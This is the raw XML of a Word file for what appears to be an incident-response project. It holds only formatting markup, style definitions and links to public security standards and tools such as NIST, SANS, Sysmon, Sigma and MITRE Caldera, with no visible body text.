    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="116BA3C4" w14:textId="3F2A08EA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="031643FA" w14:textId="7C32FADB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="6A3DC47C" w14:textId="554A0F04">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="679B5590" w14:textId="48471FFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A37501D" wp14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1FE059B5" wp14:textId="40FBFA8F">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidRPr="0006063C" w:rsidR="00FC693F" w:rsidSect="00034616">
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:footerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5DAB6C7B" wp14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:fldSimple w:instr="PAGE"/>
    </w:r>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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="50BEDA9F" wp14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Incident Response Project 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146">
    <w:nsid w:val="5d53f0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77d257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6e11c6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ffbe2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110de2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2eb0c4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70b720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414e28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1b5ebb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6d91a0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31fa8d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77f4e6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74a272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7cb3ec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58ca27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26d8d7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4e31d6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151f4a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213bdbb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6a3559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3ba8f6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74b16a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2c31e9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593ebe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24a4b3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38f7fe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4509ca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503181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3f5879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41c6dc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f92cf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3ee105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323fe0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732c6b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4dcf2b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207a89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700ceb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389945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b9772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459feb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96ef864"/>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202038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467e09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35a403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412fae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1c72ab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b17d3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29a5e7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5f66f7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6ab4c4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31f934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bb0eb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359bf2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1cd12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0ecf5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53bbeb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2e798b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6b94a9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155be3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7b57444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3bcdb0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2336f96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1adc04b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61bc64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1a24fb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7b13e7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1038ea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c4c91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3a46b3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b5b5d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451121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d9529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13eca0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1f2b27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9a786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463b81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6e6c2e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21f93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067e5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12ccb4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7b2fc86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653315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36ecc6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50a330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4adaf5a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5834b29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2e75eb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b05cc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1dc2a4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c4723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25313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4cd92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523e65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7499c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db9ee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2ea8c3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8dd9a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45fdd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970c0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c664a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e0a4a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6db16d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2c25d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7ac12d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823ba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26d4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bcaee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758f2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58dde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83937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41761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7498d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d1cd5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48a04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553245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de515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178967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04327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76e926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55bbdd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a776f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f863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a52c7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18a2d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e06d9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e5283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a049e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77f0a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df2e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044c2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575532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4e6f9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83045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b80ae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a8c92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64eba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5812a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0637a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hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>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hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>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hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>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hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstract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val="bestFit"/>
  <w:trackRevisions w:val="false"/>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E21F23"/>
    <w:rsid w:val="00FC693F"/>
    <w:rsid w:val="00FED341"/>
    <w:rsid w:val="0212F70A"/>
    <w:rsid w:val="02A32117"/>
    <w:rsid w:val="03661749"/>
    <w:rsid w:val="0386688B"/>
    <w:rsid w:val="04F12A1E"/>
    <w:rsid w:val="05EB524B"/>
    <w:rsid w:val="09F12D96"/>
    <w:rsid w:val="0BD0B8DE"/>
    <w:rsid w:val="0BE8B4CD"/>
    <w:rsid w:val="0CBDE2E3"/>
    <w:rsid w:val="10B43AE3"/>
    <w:rsid w:val="119FDEE6"/>
    <w:rsid w:val="166587AE"/>
    <w:rsid w:val="176008F4"/>
    <w:rsid w:val="17B18E76"/>
    <w:rsid w:val="198B98CA"/>
    <w:rsid w:val="1AD10196"/>
    <w:rsid w:val="1CB5E90F"/>
    <w:rsid w:val="1DAD5831"/>
    <w:rsid w:val="1EA1AA1D"/>
    <w:rsid w:val="1EE96FC6"/>
    <w:rsid w:val="20257FFF"/>
    <w:rsid w:val="2158E862"/>
    <w:rsid w:val="23446381"/>
    <w:rsid w:val="24B3C48F"/>
    <w:rsid w:val="253E68B9"/>
    <w:rsid w:val="25903F2A"/>
    <w:rsid w:val="282C5353"/>
    <w:rsid w:val="282F2B94"/>
    <w:rsid w:val="296ADF90"/>
    <w:rsid w:val="2B1969CE"/>
    <w:rsid w:val="2B45C57B"/>
    <w:rsid w:val="2C8BB9FF"/>
    <w:rsid w:val="2DAC5D1D"/>
    <w:rsid w:val="30B776D6"/>
    <w:rsid w:val="31FE6BCC"/>
    <w:rsid w:val="3535D9AE"/>
    <w:rsid w:val="36B070F3"/>
    <w:rsid w:val="380EEE82"/>
    <w:rsid w:val="3B8B1820"/>
    <w:rsid w:val="3E4290FF"/>
    <w:rsid w:val="415B7A29"/>
    <w:rsid w:val="43418316"/>
    <w:rsid w:val="436A2EA1"/>
    <w:rsid w:val="449784E7"/>
    <w:rsid w:val="45D6F7FD"/>
    <w:rsid w:val="45D9C79F"/>
    <w:rsid w:val="48E38E0D"/>
    <w:rsid w:val="4948CA67"/>
    <w:rsid w:val="4A7C860B"/>
    <w:rsid w:val="4C2DE037"/>
    <w:rsid w:val="4CAFCF01"/>
    <w:rsid w:val="4CB6031E"/>
    <w:rsid w:val="4D9AC929"/>
    <w:rsid w:val="4DD71CB4"/>
    <w:rsid w:val="527B29A1"/>
    <w:rsid w:val="52D953E6"/>
    <w:rsid w:val="5359D050"/>
    <w:rsid w:val="59D7A4B2"/>
    <w:rsid w:val="59EA99BF"/>
    <w:rsid w:val="5C4CC1AA"/>
    <w:rsid w:val="5D391F90"/>
    <w:rsid w:val="5EB90B34"/>
    <w:rsid w:val="5F791D7B"/>
    <w:rsid w:val="61E859DE"/>
    <w:rsid w:val="62AE62D7"/>
    <w:rsid w:val="6A5B74E8"/>
    <w:rsid w:val="6AC5019D"/>
    <w:rsid w:val="6B21146C"/>
    <w:rsid w:val="6BB8538E"/>
    <w:rsid w:val="715D2CED"/>
    <w:rsid w:val="727F9674"/>
    <w:rsid w:val="72B7131E"/>
    <w:rsid w:val="732EE1AE"/>
    <w:rsid w:val="73F753BA"/>
    <w:rsid w:val="73FF2745"/>
    <w:rsid w:val="7599F855"/>
    <w:rsid w:val="769BA0CF"/>
    <w:rsid w:val="7862231B"/>
    <w:rsid w:val="789930B6"/>
    <w:rsid w:val="7C3F3A55"/>
    <w:rsid w:val="7E2CBBAE"/>
    <w:rsid w:val="7EDEEA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15:docId w15:val="{31F4D38D-E510-4133-A44C-1D569118873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heme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"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styleId="HeaderChar" w:customStyle="1">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styleId="FooterChar" w:customStyle="1">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hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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hAnsiTheme="majorHAnsi"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hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>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1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtitleChar" w:customStyle="1">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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styleId="BodyTextChar" w:customStyle="1">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styleId="BodyText2Char" w:customStyle="1">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styleId="BodyText3Char" w:customStyle="1">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styleId="MacroTextChar" w:customStyle="1">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styleId="QuoteChar" w:customStyle="1">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading5Char" w:customStyle="1">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading6Char" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading7Char" w:customStyle="1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC693F"/>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FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading9Char" w:customStyle="1">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC693F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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color="4F81BD" w:themeColor="accent1" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280"/>
      <w:ind w:left="936" w:right="936"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseQuoteChar" w:customStyle="1">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color="9BBB59"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color="9BBB59"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color="9BBB59" w:themeColor="accent3" w:sz="8" w:space="0"/>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color="8064A2"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color="8064A2"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color="8064A2" w:themeColor="accent4" w:sz="8" w:space="0"/>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color="4BACC6"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color="4BACC6"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1"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shd w:val="clear" w:color="auto" w:fill="D2EAF1"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color="4BACC6" w:themeColor="accent5" w:sz="8" w:space="0"/>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color="F79646"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color="F79646"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4D0"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shd w:val="clear" w:color="auto" w:fill="FDE4D0"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color="F79646" w:themeColor="accent6" w:sz="8" w:space="0"/>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3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color="C0504D" w:themeColor="accent2" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:color="C0504D" w:themeColor="accent2" w:sz="6" w:space="0"/>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color="9BBB59" w:themeColor="accent3" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:color="9BBB59" w:themeColor="accent3" w:sz="6" w:space="0"/>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color="8064A2" w:themeColor="accent4" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:color="8064A2" w:themeColor="accent4" w:sz="6" w:space="0"/>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color="4BACC6" w:themeColor="accent5" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:color="4BACC6" w:themeColor="accent5" w:sz="6" w:space="0"/>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color="F79646" w:themeColor="accent6" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:color="F79646" w:themeColor="accent6" w:sz="6" w:space="0"/>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8064A2"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8064A2"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F79646"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F79646"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5F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6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A"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color="2C4C74" w:themeColor="accent1" w:themeShade="99" w:sz="4" w:space="0"/>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color="772C2A" w:themeColor="accent2" w:themeShade="99" w:sz="4" w:space="0"/>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color="5E7530" w:themeColor="accent3" w:themeShade="99" w:sz="4" w:space="0"/>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color="4C3B62" w:themeColor="accent4" w:themeShade="99" w:sz="4" w:space="0"/>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color="276A7C" w:themeColor="accent5" w:themeShade="99" w:sz="4" w:space="0"/>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B65608" w:themeColor="accent6" w:themeShade="99"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color="FFFFFF" w:themeColor="background1" w:sz="12" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="664E82" w:themeFill="accent4" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="664E82"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color="FFFFFF" w:themeColor="background1" w:sz="12" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="7E9C40" w:themeFill="accent3" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="7E9C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color="FFFFFF" w:themeColor="background1" w:sz="12" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F2730A" w:themeFill="accent6" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="F2730A"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color="FFFFFF" w:themeColor="background1" w:sz="12" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="348DA5" w:themeFill="accent5" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="348DA5"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uiPriority w:val="99"/>
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="732EE1AE"/>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microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf" TargetMode="External" Id="R36f19b477e31463b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/standard/60803.html" TargetMode="External" Id="R7101d9f1cfee4a82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/white-papers/incident-handlers-handbook/" TargetMode="External" Id="R81ba09d692f64a46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.ucdavis.edu/~peisert/research/2009-BEGPW-HICSS-Insider.pdf" TargetMode="External" Id="R30fcd9ea06b349ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theengineroom.org/wp-content/uploads/2020/08/OrgSec-Case-study-DDoS-attacks-June-2020.pdf?" TargetMode="External" Id="Ra06c167b3b084f4d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ijfmr.com/papers/2024/5/29087.pdf?" TargetMode="External" Id="R31f3b8d075ff4c6a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tulipslab.org/papers/althobaiti2021cscw.pdf?" TargetMode="External" Id="Rba80100f4ac54477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image.png" Id="rId1588784643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png" Id="rId680244670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.splunk.com/products/splunk/releases/9.2.0/linux/splunk-9.2.0.deb" TargetMode="External" Id="R0cde8723899b4c88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png" Id="rId1466897067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png" Id="rId1904983957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mitre/caldera.git" TargetMode="External" Id="R6f34d022ba0c48a7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8888/" TargetMode="External" Id="R70246377e5164804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png" Id="rId94596748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png" Id="rId385605370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png" Id="rId235920844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png" Id="rId1417273465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png" Id="rId1051438624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/imagea.png" Id="rId587508614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/imageb.png" Id="rId2034903187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/imagec.png" Id="rId1169531693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/imaged.png" Id="rId713694224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/imagee.png" Id="rId1972549255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/imagef.png" Id="rId789947930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png" Id="rId1879473608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png" Id="rId1333889127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png" Id="rId1216793959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png" Id="rId1588385853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png" Id="rId447233832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png" Id="rId1913929811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png" Id="rId1585051441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png" Id="rId815839058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png" Id="rId334532171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png" Id="rId1997457509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1a.png" Id="rId69493949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ccdcoe.org/uploads/2018/10/Insider_Threat_Study_CCDCOE.pdf?" TargetMode="External" Id="R23853d79b0c542bc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon?utm_source=chatgpt.com" TargetMode="External" Id="R947bb889de524a1d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon?utm_source=chatgpt.com" TargetMode="External" Id="R3dfbf9246c074387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SwiftOnSecurity/sysmon-config?utm_source=chatgpt.com" TargetMode="External" Id="R2f0db076ee04460f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SwiftOnSecurity/sysmon-config?utm_source=chatgpt.com" TargetMode="External" Id="R983a1838509f4f1d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma?utm_source=chatgpt.com" TargetMode="External" Id="R6bcccb5877f54e85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma?utm_source=chatgpt.com" TargetMode="External" Id="R2d01bdf077504afd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="rId1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Manager/>
  <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python-docx</dc:creator>
  <keywords/>
  <dc:description>generated by python-docx</dc:description>
  <lastModifiedBy>shehab eldin hesham</lastModifiedBy>
  <revision>4</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-28T21:40:51.0189439Z</dcterms:modified>
  <category/>
</coreProperties>
</file>